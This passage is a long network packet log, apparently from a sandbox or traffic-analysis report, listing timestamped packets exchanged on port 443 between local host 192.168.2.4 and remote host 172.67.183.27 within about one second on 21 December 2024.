                                                                                                                                            Dec 21, 2024 20:13:44.025011063 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.025068045 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.027095079 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.027152061 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.029228926 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.029285908 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.031305075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.031358004 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.037138939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.037198067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.041359901 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.041410923 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.043404102 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.043462038 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.047228098 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.047278881 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.049287081 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.049343109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.050487995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.050550938 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.054301023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.054352999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.056365967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.056417942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.060554981 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.060611010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.060628891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.060677052 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.062616110 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.062659979 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.065934896 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.066000938 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.066135883 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.066198111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.069063902 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.069122076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.070554972 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.070605993 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.072009087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.072062969 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.074985027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.075042963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.076522112 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.076571941 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.077802896 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.077850103 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.152760983 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.152825117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.152833939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.152877092 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.179227114 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.179282904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.179502010 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.179553986 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.181267023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.181339025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.182929993 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.182991028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.184272051 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.184324980 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.186647892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.186718941 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.187762022 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.187828064 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.190613031 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.190665007 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.191823006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.191869020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.194257021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.194302082 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.195604086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.195673943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.196846008 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.196918964 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.198297977 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.198353052 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.199695110 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.199769020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.200876951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.200927019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.203361034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.203414917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.204591036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.204638958 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.206980944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.207036972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.208129883 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.208178043 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.209574938 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.209629059 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.211011887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.211064100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.212176085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.212227106 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.214345932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.214390993 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.215481997 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.215538025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.216686964 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.216738939 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.218552113 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.218601942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.219808102 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.219866037 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.226140976 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.226193905 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.226222992 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.226269960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.226285934 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.234210014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.234226942 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.234261990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.234271049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.234294891 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.241662979 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.241720915 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.241731882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.241779089 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.344692945 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.344755888 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.371530056 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.371591091 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.371623993 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.371665955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.372773886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.372826099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.374906063 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.374952078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.376111984 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.376163006 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.377511024 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.377558947 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.378746986 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.378798962 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.379915953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.379966974 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.382157087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.382200003 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.383533001 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.383584976 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.384610891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.384659052 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.385771036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.385812998 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.387208939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.387258053 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.391849995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.391910076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.391921043 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.394265890 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.394313097 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.394320965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.394357920 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.395339012 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.395401001 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.396586895 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.396644115 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.397639036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.397685051 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.405025959 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.405042887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.405095100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.405102015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.408910990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.408982038 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.408988953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.409030914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.409832954 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.409884930 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.412051916 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.412141085 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.412997007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.413070917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.414073944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.414125919 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.415294886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.415344954 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.417303085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.417350054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.418447018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.418504000 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.419440985 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.419497967 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.424927950 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.424997091 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.425003052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.425050020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.425976038 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.426032066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.535612106 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.535698891 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.536750078 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.536801100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.563821077 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.563888073 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.569603920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.569621086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.569667101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.569679976 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.569693089 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.574697971 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.574755907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.574760914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.574804068 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.576831102 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.576890945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.578437090 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.578480005 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.578994036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.579051018 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.580338955 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.580391884 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.587681055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.587696075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.587754965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.587759972 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.591125965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.591192007 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.591197014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.592029095 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.592070103 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.592075109 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.592111111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.594057083 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.594115019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.601047993 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.601062059 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.601121902 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.601128101 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.602166891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.602214098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.602219105 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.602252960 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.603270054 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.603316069 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.608604908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.608670950 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.608689070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.608725071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.608745098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.608764887 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.610538006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.610580921 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.611833096 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.611879110 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.613250017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.613311052 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.614476919 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.614521980 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.616278887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.616322994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.727693081 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.727864981 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.729000092 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.729048967 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.729862928 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.729918957 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.756618977 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.756668091 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.757414103 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.757477045 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.758691072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.758744955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.759560108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.759613037 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.760864019 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.760916948 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.768259048 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.768274069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.768320084 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.768327951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.768377066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.775521040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.775536060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.775582075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.775588036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.775636911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.776655912 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.776701927 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.777848959 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.777895927 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.780019045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.780096054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.781928062 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.781989098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.784099102 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.784147024 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.786191940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.786259890 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.787451029 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.787508011 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.789625883 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.789674044 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.791208029 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.791261911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.793314934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.793369055 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.800637007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.800651073 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.800724983 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.800730944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.800813913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.800818920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.802930117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:44.803002119 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:44.803008080 CET44349737172.67.183.27192.168.2.4
